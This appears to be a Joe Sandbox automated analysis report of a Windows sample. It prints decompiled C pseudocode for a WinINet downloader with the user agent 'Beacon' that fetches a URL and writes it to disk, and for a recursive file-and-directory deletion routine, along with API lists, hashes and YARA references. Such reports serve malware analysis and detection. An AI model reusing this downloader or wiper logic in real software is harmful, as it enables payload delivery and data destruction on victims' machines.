				void* _v60;
				long _v72;
				void* _v76;
				void* _v80;
				void _v88;
				void* _v92;
				intOrPtr _v108;
				void* _v112;
				void _v136;
				void _v152;
				long _v168;
				long _v180;
				WCHAR* _v184;
				intOrPtr _v188;
				long _v196;
				intOrPtr _v200;
				void* __edi;
				void* __esi;
				signed int _t77;
				int _t92;
				intOrPtr _t93;
				void* _t99;
				void* _t101;
				void* _t103;
				signed int _t110;
				long _t125;
				signed short* _t131;
				void* _t135;
				long _t136;
				void* _t137;
				void* _t138;
				signed int _t149;
				signed int _t156;
				intOrPtr _t168;
				WCHAR* _t172;
				void* _t173;
				void* _t177;
				void* _t178;
				void* _t181;
				signed int _t182;
				signed int _t183;

				_t177 = __ebp;
				_t134 = __ebx;
				E00D00E90(0x24f4);
				_t77 =  *0xd64070; // 0x8a9e1774
				_a9456 = _t77 ^ _t182;
				_t172 = __ecx;
				_t168 = __edx;
				_v0 = __edx;
				_a608 = 0;
				E00D006A0(__edx,  &_a610, 0, 0x1fe);
				_a96 = 0;
				E00D006A0(_t168,  &_a98, 0, 0xfe);
				_a352 = 0;
				E00D006A0(_t168,  &_a354, 0, 0xfe);
				_a5288 = 0;
				E00D006A0(_t168,  &_a5290, 0, 0x1046);
				E00D006A0(_t168,  &_a40, 0, 0x38);
				_a52 =  &_a608;
				_a68 = 0x80;
				_a76 = 0x80;
				_t183 = _t182 + 0x3c;
				_t163 =  &_a352;
				_a36 = 0x3c;
				_a56 = 0x100;
				_a64 =  &_a96;
				_a72 =  &_a352;
				_a80 =  &_a5288;
				_a84 = 0x824;
				if(_t168 == 0) {
					__eflags = 0;
					return E00D0071A(0, __ebx, _a9456 ^ _t183,  &_a352, _t168, _t172);
				} else {
					_t92 = InternetCrackUrlW(_t172, 0, 0,  &_a36);
					_t93 = _a32;
					if(_t92 == 0 || _t93 != 3) {
						if(_t93 == 4) {
							goto L5;
						} else {
							return E00D0071A(0, _t134, _a9440 ^ _t183, _t163, 0, _t172);
						}
					} else {
						L5:
						_push(_t134);
						__eflags = _t93 - 4;
						_t173 = 0 | _t93 == 0x00000004;
						_t135 = InternetOpenW(L"Beacon", 0, 0, 0, 0);
						_v12 = _t135;
						__eflags = _t135;
						if(_t135 != 0) {
							_t166 = _a24;
							_push(_t177);
							_t178 = InternetConnectW(_t135,  &_a572, _a24,  &_a60,  &_a316, 3, 0, 0);
							_v60 = _t178;
							__eflags = _t178;
							if(_t178 != 0) {
								_t166 =  &_a1054;
								_a1052 = 0;
								E00D006A0(_t168,  &_a1054, 0, 0x1046);
								_t183 = _t183 + 0xc;
								__eflags = _a16;
								if(_a16 == 0) {
									_t99 = 0;
									do {
										_t42 = _t99 + "/"; // 0x2f
										_t149 =  *_t42 & 0x0000ffff;
										 *(_t183 + _t99 + 0x470) = _t149;
										_t99 = _t99 + 2;
										__eflags = _t149;
									} while (_t149 != 0);
								} else {
									_t131 = _a12;
									_t166 =  &_a1052 - _t131;
									__eflags = _t166;
									do {
										_t156 =  *_t131 & 0x0000ffff;
										 *(_t131 + _t166) = _t156;
										_t131 =  &(_t131[1]);
										__eflags = _t156;
									} while (_t156 != 0);
								}
								asm("sbb esi, esi");
								_t136 = ( ~_t173 & 0x00800000) + 0x80000000;
								_t101 = HttpOpenRequestW(_t178, L"HEAD",  &_a1052, L"HTTP/1.1", 0xd47270, 0, _t136, 0);
								_t173 = _t101;
								_v80 = _t101;
								_t169 = E00C8A900(_t173);
								__eflags = _t169;
								if(_t169 != 0) {
									_t166 =  &_v88;
									_v88 = 0;
									_v72 = 4;
									_t110 = HttpQueryInfoW(_t173, 0x20000005,  &_v88,  &_v72, 0);
									__eflags = _t110;
									if(_t110 == 0) {
										L19:
										_t166 = _v112;
										_t173 = HttpOpenRequestW(_v112, L"GET",  &_a1000, L"HTTP/1.1", 0xd47270, 0, _t136, 0);
										_v136 = 0x2bf20;
										InternetSetOptionW(_t173, 5,  &_v136, 4);
										InternetSetOptionW(_t173, 6,  &_v152, 4);
										_t169 = E00C8A900(_t173);
										__eflags = _t169;
										if(_t169 != 0) {
											_t166 = _v184;
											_t181 = CreateFileW(_v184, 0x40000000, 3, 0, 2, 0x80, 0);
											__eflags = _t181 - 0xffffffff;
											if(__eflags != 0) {
												_push(0x80000);
												_t138 = E00CFCE8A(_t136, _t166, _t169, __eflags);
												_t169 = 0;
												_t183 = _t183 + 4;
												__eflags = _t138;
												if(_t138 != 0) {
													_v184 = 0;
													_v152 = 0;
													_v180 = 0;
													E00D006A0(0, _t138, 0, 0x80000);
													_t183 = _t183 + 0xc;
													_t169 = InternetReadFile(_t173, _t138, 0x80000,  &_v180);
													__eflags = _t169;
													while(_t169 != 0) {
														_t125 = _v196;
														_t169 = 0;
														__eflags = _t125;
														if(__eflags <= 0) {
															if(__eflags == 0) {
																__eflags = _v200 - _v188;
																if(_v200 == _v188) {
																	_t169 = 1;
																}
															} else {
																goto L28;
															}
														} else {
															_v200 = _v200 + _t125;
															_t169 = WriteFile(_t181, _t138, _t125,  &_v168, 0);
															__eflags = _t169;
															if(_t169 != 0) {
																FlushFileBuffers(_t181);
																goto L28;
															}
														}
														goto L32;
														L28:
														_v196 = 0;
														E00D006A0(_t169, _t138, 0, 0x80000);
														_t183 = _t183 + 0xc;
														_t166 =  &_v196;
														_t169 = InternetReadFile(_t173, _t138, 0x80000,  &_v196);
														__eflags = _t169;
													}
												}
												L32:
												FlushFileBuffers(_t181);
												CloseHandle(_t181);
												__eflags = _t138;
												if(__eflags != 0) {
													_push(_t138);
													E00D00BDC(_t138, _t166, _t169, _t173, __eflags);
													_t183 = _t183 + 4;
												}
											} else {
												_t169 = 0;
											}
										}
										__eflags = _t173;
										if(_t173 != 0) {
											InternetCloseHandle(_t173);
										}
									} else {
										__eflags = _v108 - 0x3e800000;
										if(_v108 <= 0x3e800000) {
											goto L19;
										} else {
											_t169 = 0;
										}
									}
								}
								_t103 = _v80;
								__eflags = _t103;
								if(_t103 != 0) {
									InternetCloseHandle(_t103);
								}
								_t135 = _v76;
								_t178 = _v92;
							} else {
								_t169 = 0;
							}
							__eflags = _t178;
							if(_t178 != 0) {
								InternetCloseHandle(_t178);
							}
						} else {
							_t169 = 0;
						}
						__eflags = _t135;
						if(_t135 != 0) {
							InternetCloseHandle(_t135);
						}
						_pop(_t137);
						__eflags = _a9356 ^ _t183;
						return E00D0071A(_t169, _t137, _a9356 ^ _t183, _t166, _t169, _t173);
					}
				}
			}














































                                                                                                                                                                                          0x00c8aa00
                                                                                                                                                                                          0x00c8aa00
                                                                                                                                                                                          0x00c8aa05
                                                                                                                                                                                          0x00c8aa0a
                                                                                                                                                                                          0x00c8aa11
                                                                                                                                                                                          0x00c8aa21
                                                                                                                                                                                          0x00c8aa2b
                                                                                                                                                                                          0x00c8aa2e
                                                                                                                                                                                          0x00c8aa32
                                                                                                                                                                                          0x00c8aa3a
                                                                                                                                                                                          0x00c8aa4c
                                                                                                                                                                                          0x00c8aa54
                                                                                                                                                                                          0x00c8aa69
                                                                                                                                                                                          0x00c8aa71
                                                                                                                                                                                          0x00c8aa86
                                                                                                                                                                                          0x00c8aa8e
                                                                                                                                                                                          0x00c8aa9c
                                                                                                                                                                                          0x00c8aaa8
                                                                                                                                                                                          0x00c8aab1
                                                                                                                                                                                          0x00c8aab8
                                                                                                                                                                                          0x00c8aabf
                                                                                                                                                                                          0x00c8aac6
                                                                                                                                                                                          0x00c8aad4
                                                                                                                                                                                          0x00c8aadc
                                                                                                                                                                                          0x00c8aae4
                                                                                                                                                                                          0x00c8aae8
                                                                                                                                                                                          0x00c8aaec
                                                                                                                                                                                          0x00c8aaf0
                                                                                                                                                                                          0x00c8aafa
                                                                                                                                                                                          0x00c8ae5b
                                                                                                                                                                                          0x00c8ae68
                                                                                                                                                                                          0x00c8ab00
                                                                                                                                                                                          0x00c8ab0a
                                                                                                                                                                                          0x00c8ab12
                                                                                                                                                                                          0x00c8ab16
                                                                                                                                                                                          0x00c8ab20
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ab22
                                                                                                                                                                                          0x00c8ab3c
                                                                                                                                                                                          0x00c8ab3c
                                                                                                                                                                                          0x00c8ab3d
                                                                                                                                                                                          0x00c8ab3d
                                                                                                                                                                                          0x00c8ab3d
                                                                                                                                                                                          0x00c8ab42
                                                                                                                                                                                          0x00c8ab53
                                                                                                                                                                                          0x00c8ab5b
                                                                                                                                                                                          0x00c8ab5d
                                                                                                                                                                                          0x00c8ab61
                                                                                                                                                                                          0x00c8ab63
                                                                                                                                                                                          0x00c8ab6c
                                                                                                                                                                                          0x00c8ab70
                                                                                                                                                                                          0x00c8ab97
                                                                                                                                                                                          0x00c8ab99
                                                                                                                                                                                          0x00c8ab9d
                                                                                                                                                                                          0x00c8ab9f
                                                                                                                                                                                          0x00c8abb0
                                                                                                                                                                                          0x00c8abb8
                                                                                                                                                                                          0x00c8abc0
                                                                                                                                                                                          0x00c8abc5
                                                                                                                                                                                          0x00c8abc8
                                                                                                                                                                                          0x00c8abcd
                                                                                                                                                                                          0x00c8abf1
                                                                                                                                                                                          0x00c8ac00
                                                                                                                                                                                          0x00c8ac00
                                                                                                                                                                                          0x00c8ac00
                                                                                                                                                                                          0x00c8ac07
                                                                                                                                                                                          0x00c8ac0f
                                                                                                                                                                                          0x00c8ac12
                                                                                                                                                                                          0x00c8ac12
                                                                                                                                                                                          0x00c8abcf
                                                                                                                                                                                          0x00c8abcf
                                                                                                                                                                                          0x00c8abda
                                                                                                                                                                                          0x00c8abda
                                                                                                                                                                                          0x00c8abe0
                                                                                                                                                                                          0x00c8abe0
                                                                                                                                                                                          0x00c8abe3
                                                                                                                                                                                          0x00c8abe7
                                                                                                                                                                                          0x00c8abea
                                                                                                                                                                                          0x00c8abea
                                                                                                                                                                                          0x00c8abef
                                                                                                                                                                                          0x00c8ac19
                                                                                                                                                                                          0x00c8ac29
                                                                                                                                                                                          0x00c8ac4c
                                                                                                                                                                                          0x00c8ac4e
                                                                                                                                                                                          0x00c8ac50
                                                                                                                                                                                          0x00c8ac59
                                                                                                                                                                                          0x00c8ac5b
                                                                                                                                                                                          0x00c8ac5d
                                                                                                                                                                                          0x00c8ac6a
                                                                                                                                                                                          0x00c8ac77
                                                                                                                                                                                          0x00c8ac7f
                                                                                                                                                                                          0x00c8ac87
                                                                                                                                                                                          0x00c8ac8d
                                                                                                                                                                                          0x00c8ac8f
                                                                                                                                                                                          0x00c8aca2
                                                                                                                                                                                          0x00c8aca2
                                                                                                                                                                                          0x00c8accb
                                                                                                                                                                                          0x00c8acd7
                                                                                                                                                                                          0x00c8acdf
                                                                                                                                                                                          0x00c8aceb
                                                                                                                                                                                          0x00c8acf2
                                                                                                                                                                                          0x00c8acf4
                                                                                                                                                                                          0x00c8acf6
                                                                                                                                                                                          0x00c8acfc
                                                                                                                                                                                          0x00c8ad19
                                                                                                                                                                                          0x00c8ad1b
                                                                                                                                                                                          0x00c8ad1e
                                                                                                                                                                                          0x00c8ad27
                                                                                                                                                                                          0x00c8ad31
                                                                                                                                                                                          0x00c8ad33
                                                                                                                                                                                          0x00c8ad35
                                                                                                                                                                                          0x00c8ad38
                                                                                                                                                                                          0x00c8ad3a
                                                                                                                                                                                          0x00c8ad47
                                                                                                                                                                                          0x00c8ad4b
                                                                                                                                                                                          0x00c8ad4f
                                                                                                                                                                                          0x00c8ad53
                                                                                                                                                                                          0x00c8ad58
                                                                                                                                                                                          0x00c8ad6d
                                                                                                                                                                                          0x00c8ad6f
                                                                                                                                                                                          0x00c8ad71
                                                                                                                                                                                          0x00c8ad73
                                                                                                                                                                                          0x00c8ad77
                                                                                                                                                                                          0x00c8ad79
                                                                                                                                                                                          0x00c8ad7b
                                                                                                                                                                                          0x00c8ad9f
                                                                                                                                                                                          0x00c8add7
                                                                                                                                                                                          0x00c8addb
                                                                                                                                                                                          0x00c8addd
                                                                                                                                                                                          0x00c8addd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ad7d
                                                                                                                                                                                          0x00c8ad7d
                                                                                                                                                                                          0x00c8ad90
                                                                                                                                                                                          0x00c8ad92
                                                                                                                                                                                          0x00c8ad94
                                                                                                                                                                                          0x00c8ad97
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ad97
                                                                                                                                                                                          0x00c8ad94
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ada1
                                                                                                                                                                                          0x00c8ada9
                                                                                                                                                                                          0x00c8adb1
                                                                                                                                                                                          0x00c8adb6
                                                                                                                                                                                          0x00c8adb9
                                                                                                                                                                                          0x00c8adcb
                                                                                                                                                                                          0x00c8adcd
                                                                                                                                                                                          0x00c8adcd
                                                                                                                                                                                          0x00c8ad71
                                                                                                                                                                                          0x00c8ade2
                                                                                                                                                                                          0x00c8ade3
                                                                                                                                                                                          0x00c8adea
                                                                                                                                                                                          0x00c8adf0
                                                                                                                                                                                          0x00c8adf2
                                                                                                                                                                                          0x00c8adf4
                                                                                                                                                                                          0x00c8adf5
                                                                                                                                                                                          0x00c8adfa
                                                                                                                                                                                          0x00c8adfa
                                                                                                                                                                                          0x00c8ad20
                                                                                                                                                                                          0x00c8ad20
                                                                                                                                                                                          0x00c8ad20
                                                                                                                                                                                          0x00c8ad1e
                                                                                                                                                                                          0x00c8adfd
                                                                                                                                                                                          0x00c8adff
                                                                                                                                                                                          0x00c8ae02
                                                                                                                                                                                          0x00c8ae02
                                                                                                                                                                                          0x00c8ac91
                                                                                                                                                                                          0x00c8ac91
                                                                                                                                                                                          0x00c8ac99
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ac9b
                                                                                                                                                                                          0x00c8ac9b
                                                                                                                                                                                          0x00c8ac9b
                                                                                                                                                                                          0x00c8ac99
                                                                                                                                                                                          0x00c8ac8f
                                                                                                                                                                                          0x00c8ae08
                                                                                                                                                                                          0x00c8ae0c
                                                                                                                                                                                          0x00c8ae0e
                                                                                                                                                                                          0x00c8ae11
                                                                                                                                                                                          0x00c8ae11
                                                                                                                                                                                          0x00c8ae17
                                                                                                                                                                                          0x00c8ae1b
                                                                                                                                                                                          0x00c8aba1
                                                                                                                                                                                          0x00c8aba1
                                                                                                                                                                                          0x00c8aba1
                                                                                                                                                                                          0x00c8ae1f
                                                                                                                                                                                          0x00c8ae21
                                                                                                                                                                                          0x00c8ae24
                                                                                                                                                                                          0x00c8ae24
                                                                                                                                                                                          0x00c8ab65
                                                                                                                                                                                          0x00c8ab65
                                                                                                                                                                                          0x00c8ab65
                                                                                                                                                                                          0x00c8ae2b
                                                                                                                                                                                          0x00c8ae2d
                                                                                                                                                                                          0x00c8ae30
                                                                                                                                                                                          0x00c8ae30
                                                                                                                                                                                          0x00c8ae36
                                                                                                                                                                                          0x00c8ae42
                                                                                                                                                                                          0x00c8ae4f
                                                                                                                                                                                          0x00c8ae4f
                                                                                                                                                                                          0x00c8ab16

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8AA3A
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8AA54
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8AA71
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8AA8E
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8AA9C
                                                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000003C), ref: 00C8AB0A
                                                                                                                                                                                          • InternetOpenW.WININET(Beacon,00000000,00000000,00000000,00000000), ref: 00C8AB55
                                                                                                                                                                                          • InternetConnectW.WININET(00000000,?,?,?,?,00000003,00000000,00000000), ref: 00C8AB91
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8ABC0
                                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,HEAD,?,HTTP/1.1,00D47270,00000000,-80000000,00000000), ref: 00C8AC4C
                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,20000005,?,?,00000000), ref: 00C8AC87
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00C8AE11
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00C8AE24
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00C8AE30
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet_memset$CloseHandle$HttpOpen$ConnectCrackInfoQueryRequest
                                                                                                                                                                                          • String ID: <$Beacon$GET$HEAD$HTTP/1.1
                                                                                                                                                                                          • API String ID: 1691518250-2252145399
                                                                                                                                                                                          • Opcode ID: 2fd41b361e092a6c33849a636c9501a8cbdecb37922397fd587c72800a9323c6
                                                                                                                                                                                          • Instruction ID: caac252e25dd79632caabb552fbf0559458dc7f653aea8889eab7509623190c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd41b361e092a6c33849a636c9501a8cbdecb37922397fd587c72800a9323c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DB19371604300AFE360AF65CC46FAB76E9EFC4704F54091EF599D7290EBB499048B6B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE31FB Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 136fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E00CE31FB(void* __edx, void* __edi, void* __esi) {
				void* __ebx;
				signed int _t41;
				void* _t59;
				signed int _t71;
				WCHAR* _t84;
				void* _t85;
				void* _t91;
				void* _t92;
				void* _t96;
				signed int _t97;
				void* _t99;
				void* _t100;
				void* _t102;

				_t94 = __esi;
				_t92 = __edi;
				_t91 = __edx;
				_t97 = _t99 - 0x5ec;
				_t100 = _t99 - 0x66c;
				_t41 =  *0xd64070; // 0x8a9e1774
				 *(_t97 + 0x5e8) = _t41 ^ _t97;
				_t84 =  *(_t97 + 0x5f4);
				if(_t84 != 0) {
					if(PathFileExistsW(_t84) == 0 || E00D00EBB(_t84) <= 3) {
						goto L1;
					} else {
						_push(__esi);
						 *(_t97 + 0x3e0) = 0;
						 *(_t97 - 0x7c) = 1;
						E00D006A0(__edi, _t97 + 0x3e2, 0, 0x206);
						 *(_t97 + 0x1d8) = 0;
						E00D006A0(_t92, _t97 + 0x1da, 0, 0x206);
						_t96 = PathAppendW;
						_t102 = _t100 + 0x18;
						PathAppendW(_t97 + 0x1d8, _t84);
						PathAppendW(_t97 + 0x1d8, L"\\*.*");
						_t59 = FindFirstFileW(_t97 + 0x1d8, _t97 - 0x78);
						 *(_t97 - 0x80) = _t59;
						if(_t59 == 0xffffffff) {
							L18:
							_t44 = RemoveDirectoryW(_t84) &  *(_t97 - 0x7c);
							_pop(_t94);
							L19:
							_pop(_t85);
							return E00D0071A(_t44, _t85,  *(_t97 + 0x5e8) ^ _t97, _t91, _t92, _t94);
						}
						if(FindNextFileW(_t59, _t97 - 0x78) == 0) {
							L17:
							FindClose( *(_t97 - 0x80));
							goto L18;
						} else {
							_push(_t92);
							do {
								if(( *(_t97 - 0x78) & 0x00000010) == 0) {
									E00D006A0(0x208, _t97 + 0x3e0, 0, 0x208);
									_t102 = _t102 + 0xc;
									PathAppendW(_t97 + 0x3e0, _t84);
									PathAppendW(_t97 + 0x3e0, _t97 - 0x4c);
									_t71 = DeleteFileW(_t97 + 0x3e0);
									if(_t71 == 0) {
										 *(_t97 - 0x7c) =  *(_t97 - 0x7c) & _t71;
									}
								} else {
									if( *(_t97 - 0x4c) != 0x2e ||  *((short*)(_t97 - 0x4a)) != 0 && ( *((short*)(_t97 - 0x4a)) != 0x2e ||  *((short*)(_t97 - 0x48)) != 0)) {
										E00D006A0(0x208, _t97 + 0x3e0, 0, 0x208);
										_t102 = _t102 + 0xc;
										PathAppendW(_t97 + 0x3e0, _t84);
										PathAppendW(_t97 + 0x3e0, _t97 - 0x4c);
										_push(_t97 + 0x3e0);
										 *(_t97 - 0x7c) =  *(_t97 - 0x7c) & E00CE31FB(_t91, 0x208, _t96);
									}
								}
							} while (FindNextFileW( *(_t97 - 0x80), _t97 - 0x78) != 0);
							_pop(_t92);
							goto L17;
						}
					}
				}
				L1:
				_t44 = 0;
				goto L19;
			}
















                                                                                                                                                                                          0x00ce31fb
                                                                                                                                                                                          0x00ce31fb
                                                                                                                                                                                          0x00ce31fb
                                                                                                                                                                                          0x00ce31fc
                                                                                                                                                                                          0x00ce3203
                                                                                                                                                                                          0x00ce3209
                                                                                                                                                                                          0x00ce3210
                                                                                                                                                                                          0x00ce3217
                                                                                                                                                                                          0x00ce321f
                                                                                                                                                                                          0x00ce3231
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce323f
                                                                                                                                                                                          0x00ce323f
                                                                                                                                                                                          0x00ce3249
                                                                                                                                                                                          0x00ce3257
                                                                                                                                                                                          0x00ce325e
                                                                                                                                                                                          0x00ce3267
                                                                                                                                                                                          0x00ce3275
                                                                                                                                                                                          0x00ce327a
                                                                                                                                                                                          0x00ce3280
                                                                                                                                                                                          0x00ce328b
                                                                                                                                                                                          0x00ce3299
                                                                                                                                                                                          0x00ce32a6
                                                                                                                                                                                          0x00ce32ac
                                                                                                                                                                                          0x00ce32b2
                                                                                                                                                                                          0x00ce338e
                                                                                                                                                                                          0x00ce3395
                                                                                                                                                                                          0x00ce3398
                                                                                                                                                                                          0x00ce3399
                                                                                                                                                                                          0x00ce33a1
                                                                                                                                                                                          0x00ce33ae
                                                                                                                                                                                          0x00ce33ae
                                                                                                                                                                                          0x00ce32c5
                                                                                                                                                                                          0x00ce3385
                                                                                                                                                                                          0x00ce3388
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce32cb
                                                                                                                                                                                          0x00ce32cb
                                                                                                                                                                                          0x00ce32d1
                                                                                                                                                                                          0x00ce32d5
                                                                                                                                                                                          0x00ce333c
                                                                                                                                                                                          0x00ce3341
                                                                                                                                                                                          0x00ce334c
                                                                                                                                                                                          0x00ce3359
                                                                                                                                                                                          0x00ce3362
                                                                                                                                                                                          0x00ce336a
                                                                                                                                                                                          0x00ce336c
                                                                                                                                                                                          0x00ce336c
                                                                                                                                                                                          0x00ce32d7
                                                                                                                                                                                          0x00ce32dc
                                                                                                                                                                                          0x00ce3301
                                                                                                                                                                                          0x00ce3306
                                                                                                                                                                                          0x00ce3311
                                                                                                                                                                                          0x00ce331e
                                                                                                                                                                                          0x00ce3326
                                                                                                                                                                                          0x00ce332c
                                                                                                                                                                                          0x00ce332f
                                                                                                                                                                                          0x00ce32dc
                                                                                                                                                                                          0x00ce337c
                                                                                                                                                                                          0x00ce3384
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce3384
                                                                                                                                                                                          0x00ce32c5
                                                                                                                                                                                          0x00ce3231
                                                                                                                                                                                          0x00ce3221
                                                                                                                                                                                          0x00ce3221
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,00000000), ref: 00CE3229
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00CE3234
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE325E
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE3275
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,?,?,?,?,?,?,76EC44F0), ref: 00CE328B
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,\*.*,?,?,?,?,?,76EC44F0), ref: 00CE3299
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,76EC44F0), ref: 00CE32A6
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,76EC44F0), ref: 00CE32BD
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE3301
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,76EC44F0), ref: 00CE3311
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,76EC44F0), ref: 00CE331E
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,76EC44F0), ref: 00CE3376
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,?,?,76EC44F0), ref: 00CE3388
                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,76EC44F0), ref: 00CE338F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$AppendFileFind$_memset$Next$CloseDirectoryExistsFirstRemove_wcslen
                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                          • API String ID: 3846514479-1173974218
                                                                                                                                                                                          • Opcode ID: 28a1f5d2efdc28b677f9e9078cc5ba36ab89fcd4af9e9253fdffc0a148f9eaa9
                                                                                                                                                                                          • Instruction ID: 6997ad99b2cb363171180b3b24a02587267c791b1e1344d36b0c5bf380e7c1a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 28a1f5d2efdc28b677f9e9078cc5ba36ab89fcd4af9e9253fdffc0a148f9eaa9
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB413DB29002C8ABDB31EFB5DC89FDE7BACAF04310F00051AA959D7191EA75A7458F60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C94B30 Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 369memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00C94B30(void* __ecx, void* __edx, long __edi, void* __esi, void* __eflags) {
				void* __ebx;
				signed int _t103;
				void* _t109;
				void* _t110;
				void* _t112;
				void* _t123;
				void _t124;
				intOrPtr _t127;
				void* _t134;
				void*** _t137;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t145;
				void*** _t147;
				intOrPtr* _t151;
				void _t152;
				void* _t156;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t194;
				void* _t215;
				intOrPtr _t219;
				long _t226;
				intOrPtr _t228;
				char* _t229;
				intOrPtr _t230;
				signed int _t237;
				void* _t239;
				void* _t240;
				void* _t245;
				void* _t246;
				void* _t251;
				signed int _t252;
				void* _t253;

				_t223 = __edi;
				_t214 = __edx;
				_push(0xffffffff);
				_push(0xd390c9);
				_push( *[fs:0x0]);
				_t252 = _t251 - 0x40;
				_push(_t245);
				_push(__edi);
				_t103 =  *0xd64070; // 0x8a9e1774
				_push(_t103 ^ _t252);
				 *[fs:0x0] = _t252 + 0x54;
				_t235 =  *((intOrPtr*)(_t252 + 0x64));
				_t178 = 0;
				 *((intOrPtr*)(_t252 + 0x18)) = 0;
